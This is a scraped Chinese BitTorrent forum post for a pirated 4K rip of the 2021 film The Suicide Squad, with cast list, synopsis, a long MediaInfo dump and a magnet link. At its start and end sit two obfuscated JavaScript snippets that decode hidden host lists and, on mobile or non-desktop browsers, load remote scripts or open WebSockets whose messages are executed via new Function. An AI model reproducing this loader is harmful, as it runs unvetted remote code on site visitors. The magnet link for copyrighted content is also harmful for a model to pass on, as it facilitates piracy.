X特遣队:全员集结[简繁字幕].The.Suicide.Squad.2021.UHD.BluRay.2160p.TrueHD.Atmos.7.1.x265.10bit.HDR 18.79GB

版主小s 1月前 210

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 X特遣队:全员集结 / 新自杀小队 / 自杀特攻(港) / 自杀突击队集结(台) / 自杀小队2 / X特遣队2 / 自杀突击队2 / Suicide Squad 2

◎片 名 The Suicide Squad

◎年 代 2021

◎产 地 美国 / 加拿大 / 英国

◎类 别 喜剧 / 动作 / 科幻 / 冒险

◎语 言 英语 / 西班牙语

◎上映日期 2021-07-28(法国) / 2021-08-06(美国)

◎IMDb链接 https://www.imdb.com/title/tt6334354/

◎豆瓣评分 8.1/10 (166377人评价)

◎豆瓣链接 https://movie.douban.com/subject/26741632/

◎片 长 132分钟

◎导 演 詹姆斯·古恩 James Gunn (id:1092322)

◎编 剧 詹姆斯·古恩 James Gunn (id:1092322)

约翰·奥斯特兰德 John Ostrander (id:1184651)

◎演 员 玛格特·罗比 Margot Robbie (id:1272303)

伊德里斯·艾尔巴 Idris Elba (id:1049501)

约翰·塞纳 John Cena (id:1044883)

乔尔·金纳曼 Joel Kinnaman (id:1036743)

西尔维斯特·史泰龙 Sylvester Stallone (id:1047996)

维奥拉·戴维斯 Viola Davis (id:1022676)

大卫·达斯马齐连 David Dastmalchian (id:1337583)

迈克尔·鲁克 Michael Rooker (id:1002751)

杰·科特尼 Jai Courtney (id:1324668)

彼得·卡帕尔迪 Peter Capaldi (id:1002770)

艾莉丝·布拉加 Alice Braga (id:1000057)

皮特·戴维森 Pete Davidson (id:1345362)

华金·科西奥 Joaquín Cosio (id:1306249)

胡安·迭戈·博托 Juan Diego Botto (id:1050242)

斯托姆·瑞德 Storm Reid (id:1372985)

内森·菲利安 Nathan Fillion (id:1000003)

塔伊加·维迪提 Taika Waititi (id:1076354)

史蒂夫·阿吉 Steve Agee (id:1032405)

肖恩·古恩 Sean Gunn (id:1022552)

弗卢拉·博格 Flula Borg (id:1349608)

约翰·奥斯特兰德 John Ostrander (id:1184651)

黄美玲 Mayling Ng (id:1423051)

丹妮拉·曼希沃 Daniela Melchior (id:1415828)

史蒂芬·布莱克哈特 Stephen Blackehart (id:1037043)

詹尼佛·霍兰德 Jennifer Holland (id:1387847)

迪·布拉雷·贝克尔 Dee Bradley Baker (id:1059406)

雷·埃尔南德斯 Rey Hernandez (id:1323494)

雷纳尔多·法伯勒 Reinaldo Faberlle (id:1448272)

乔希·文图拉 Josh Ventura (id:1395770)

Gerardo Davila Gerardo Davila (id:1213150)

米凯拉·霍沃 Mikaela Hoover (id:1229185)

林恩·阿什 Lynne Ashe (id:1397590)

安德里娅·安德拉德 Andrea Andrade (id:1440532)

兰德尔·P·海文斯 Randall P. Havens (id:1360135)

迈克尔·艾伦·米利甘 Michael Aaron Milligan (id:1366809)

特伦斯·罗斯摩尔 Terence Rosemore (id:1142633)

娜塔莉·萨福兰 Natalia Safran (id:1336790)

詹姆斯·威廉·巴拉德 James William Ballard (id:1434106)

蒂莫西·卡尔 Timothy Carr (id:1392730)

玛丽索尔·科雷亚 Marisol Correa (id:1391400)

约翰·盖蒂尔 John Gettier (id:1392772)

麦克斯威尔·海史密斯 Maxwell Highsmith (id:1392725)

洛伊德·考夫曼 Lloyd Kaufman (id:1054246)

迪索·拉莫斯 Diezel Ramos (id:1341036)

弗雷迪·史卓玛 Freddie Stroma (id:1013976)

维多利亚·佩吉·沃特金斯 Victoria Paige Watkins (id:1434123)

扎克·施奈德 Zack Snyder (id:1031904)

黛博拉·施奈德 Deborah Snyder (id:1375247)

迈克·德·鲁卡 Michael De Luca (id:1314002)

彼得·萨夫兰 Peter Safran (id:1041657)

约翰·墨菲 John Murphy (id:1326645)

贝丝·米克尔 Beth Mickle (id:1420701)

◎标 签 DC / 美国 / 科幻 / 漫画改编 / 动作 / 犯罪 / 喜剧 / 2021

◎简 介

关押在美梦监狱的X特遣队成员获得一项可以减轻刑罚的新任务,前往南美洲的科托马耳他岛国,摧毁纳粹时期遗留的约顿海姆监狱和实验室,它当前用于关押该国的政治犯并施行人体实验。执行任务期间,X特遣队遭遇巨型外星生物海星斯塔罗,并与它发生冲突。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 76488499256919044209778712449102801723 (0x398B262C347818DD02C3FAE662166B3B)

  4. Complete name : The.Suicide.Sq[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 18.8 GiB

  8. Duration : 2 h 12 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 20.4 Mb/s

  11. Encoded date : UTC 2021-10-23 15:47:00

  12. Writing application : mkvmerge v49.0.0 ('Sick Of Losing Soulmates') 64-bit

  13. Writing library : libebml v1.4.0 + libmatroska v1.6.1


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. HDR format : SMPTE ST 2086, HDR10 compatible

  20. Codec ID : V_MPEGH/ISO/HEVC

  21. Duration : 2 h 12 min

  22. Bit rate : 16.0 Mb/s

  23. Width : 3 840 pixels

  24. Height : 2 024 pixels

  25. Display aspect ratio : 1.897

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0 (Type 2)

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.086

  32. Stream size : 14.8 GiB (79%)

  33. Title : HEVC, x265Main1[email protected]@High, 24/1.001 fps @ 16693 kbps

  34. Writing library : x265 3.4+14-gd419c7152:[Windows][GCC 10.2.0][64 bit] 10bit

  35. Encoding settings : cpuid=533541111039 / frame-threads=4 / numa-pools=20 / wpp / pmode / pme / no-psnr / no-ssim / log-level=2 / input-csp=1 / input-res=3840x2024 / interlace=0 / total-frames=190056 / level-idc=51 / high-tier=1 / uhd-bd=0 / ref=4 / no-allow-non-conformance / repeat-headers / annexb / no-aud / hrd / info / hash=0 / no-temporal-layers / no-open-gop / min-keyint=24 / keyint=240 / gop-lookahead=0 / bframes=8 / b-adapt=2 / b-pyramid / bframe-bias=0 / rc-lookahead=25 / lookahead-slices=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / no-splice / no-intra-refresh / ctu=64 / min-cu-size=8 / no-rect / no-amp / max-tu-size=32 / tu-inter-depth=3 / tu-intra-depth=3 / limit-tu=4 / rdoq-level=2 / dynamic-rd=0.00 / no-ssim-rd / signhide / no-tskip / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-merge=4 / limit-refs=1 / limit-modes / me=3 / subme=4 / merange=57 / temporal-mvp / no-frame-dup / no-hme / weightp / weightb / no-analyze-src-pics / deblock=-3:-3 / no-sao / no-sao-non-deblock / rd=6 / selective-sao=0 / no-early-skip / rskip / no-fast-intra / no-tskip-fast / no-cu-lossless / b-intra / no-splitrd-skip / rdpenalty=0 / psy-rd=2.00 / psy-rdoq=1.00 / no-rd-refine / no-lossless / cbqpoffs=0 / crqpoffs=0 / rc=crf / crf=18.5 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / crf-max=0.0 / crf-min=0.0 / ipratio=1.30 / pbratio=1.20 / aq-mode=3 / aq-strength=0.85 / cutree / zone-count=0 / no-strict-cbr / qg-size=32 / no-rc-grain / qpmax=69 / qpmin=0 / no-const-vbv / sar=1 / overscan=0 / videoformat=5 / range=0 / colorprim=9 / transfer=16 / colormatrix=9 / chromaloc=1 / chromaloc-top=2 / chromaloc-bottom=2 / display-window=0 / master-display=G(13250,34500)B(7500,3000)R(34000,16000)WP(15635,16450)L(10000000,10) / cll=571,257 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / hdr10 / hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / no-scenecut-aware-qpconformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0

  36. Language : English

  37. Default : Yes

  38. Forced : No

  39. Color range : Limited

  40. Color primaries : BT.2020

  41. Transfer characteristics : PQ

  42. Matrix coefficients : BT.2020 non-constant

  43. Mastering display color primaries : Display P3

  44. Mastering display luminance : min: 0.0010 cd/m2, max: 1000 cd/m2

  45. Maximum Content Light Level : 571 cd/m2

  46. Maximum Frame-Average Light Level : 257 cd/m2


  47. Audio #1

  48. ID : 2

  49. Format : MLP FBA 16-ch

  50. Format/Info : Meridian Lossless Packing FBA with 16-channel presentation

  51. Commercial name : Dolby TrueHD with Dolby Atmos

  52. Codec ID : A_TRUEHD

  53. Duration : 2 h 12 min

  54. Bit rate mode : Variable

  55. Bit rate : 3 455 kb/s

  56. Maximum bit rate : 5 478 kb/s

  57. Channel(s) : 8 channels

  58. Channel layout : L R C LFE Ls Rs Lb Rb

  59. Sampling rate : 48.0 kHz

  60. Frame rate : 1 200.000 FPS (40 SPF)

  61. Compression mode : Lossless

  62. Stream size : 3.19 GiB (17%)

  63. Title : English Dolby TrueHD 7.1 (Atmos) @ 3903 kbps

  64. Language : English

  65. Default : Yes

  66. Forced : No

  67. Number of dynamic objects : 11

  68. Bed channel count : 1 channel

  69. Bed channel configuration : LFE


  70. Audio #2

  71. ID : 3

  72. Format : AC-3

  73. Format/Info : Audio Coding 3

  74. Commercial name : Dolby Digital

  75. Codec ID : A_AC3

  76. Duration : 2 h 12 min

  77. Bit rate mode : Constant

  78. Bit rate : 448 kb/s

  79. Channel(s) : 6 channels

  80. Channel layout : L R C LFE Ls Rs

  81. Sampling rate : 48.0 kHz

  82. Frame rate : 31.250 FPS (1536 SPF)

  83. Compression mode : Lossy

  84. Stream size : 423 MiB (2%)

  85. Title : English Dolby 5.1-EX 5.1 @ 640 kbps

  86. Language : English

  87. Service kind : Complete Main

  88. Default : No

  89. Forced : No


  90. Audio #3

  91. ID : 4

  92. Format : AC-3

  93. Format/Info : Audio Coding 3

  94. Commercial name : Dolby Digital

  95. Codec ID : A_AC3

  96. Duration : 2 h 12 min

  97. Bit rate mode : Constant

  98. Bit rate : 192 kb/s

  99. Channel(s) : 2 channels

  100. Channel layout : L R

  101. Sampling rate : 48.0 kHz

  102. Frame rate : 31.250 FPS (1536 SPF)

  103. Compression mode : Lossy

  104. Stream size : 181 MiB (1%)

  105. Title : English Dolby Digital Audio 2.0 @ 192 kbps Commentary

  106. Language : English

  107. Service kind : Complete Main

  108. Default : No

  109. Forced : No


  110. Text #1

  111. ID : 5

  112. Format : PGS

  113. Codec ID : S_HDMV/PGS

  114. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  115. Duration : 2 h 11 min

  116. Bit rate : 36.5 kb/s

  117. Count of elements : 3892

  118. Stream size : 34.4 MiB (0%)

  119. Title : Eng/SUP

  120. Language : English

  121. Default : No

  122. Forced : No


  123. Text #2

  124. ID : 6

  125. Format : PGS

  126. Codec ID : S_HDMV/PGS

  127. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  128. Duration : 2 h 10 min

  129. Bit rate : 25.8 kb/s

  130. Count of elements : 2528

  131. Stream size : 24.1 MiB (0%)

  132. Title : Chs/SUP 简体

  133. Language : Chinese

  134. Default : Yes

  135. Forced : No


  136. Text #3

  137. ID : 7

  138. Format : PGS

  139. Codec ID : S_HDMV/PGS

  140. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  141. Duration : 2 h 10 min

  142. Bit rate : 26.5 kb/s

  143. Count of elements : 2528

  144. Stream size : 24.7 MiB (0%)

  145. Title : Cht/SUP 繁体

  146. Language : Chinese

  147. Default : No

  148. Forced : No


  149. Text #4

  150. ID : 8

  151. Format : PGS

  152. Codec ID : S_HDMV/PGS

  153. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  154. Duration : 2 h 11 min

  155. Bit rate : 47.3 kb/s

  156. Count of elements : 2449

  157. Stream size : 44.5 MiB (0%)

  158. Title : Chs/SUP 简英双语

  159. Language : Chinese

  160. Default : No

  161. Forced : No


  162. Text #5

  163. ID : 9

  164. Format : PGS

  165. Codec ID : S_HDMV/PGS

  166. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  167. Duration : 2 h 11 min

  168. Bit rate : 48.0 kb/s

  169. Count of elements : 2449

  170. Stream size : 45.1 MiB (0%)

  171. Title : Cht/SUP 繁英双语

  172. Language : Chinese

  173. Default : No

  174. Forced : No


  175. Menu

  176. 00:00:00.000 : en:第 01 章

  177. 00:14:25.614 : en:第 02 章

  178. 00:22:08.035 : en:第 03 章

  179. 00:31:31.972 : en:第 04 章

  180. 00:40:48.695 : en:第 05 章

  181. 00:50:20.016 : en:第 06 章

  182. 01:01:09.664 : en:第 07 章

  183. 01:10:05.868 : en:第 08 章

  184. 01:19:44.488 : en:第 09 章

  185. 01:29:00.667 : en:第 10 章

  186. 01:40:41.159 : en:第 11 章

  187. 01:50:37.130 : en:第 12 章

  188. 01:59:28.536 : en:第 13 章



TAGS 动作 冒险 科幻 喜剧

磁力链:
  • magnet:?xt=urn:btih:ED5BF280BFD507302DD6B2497F58A09D907E4A2B

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};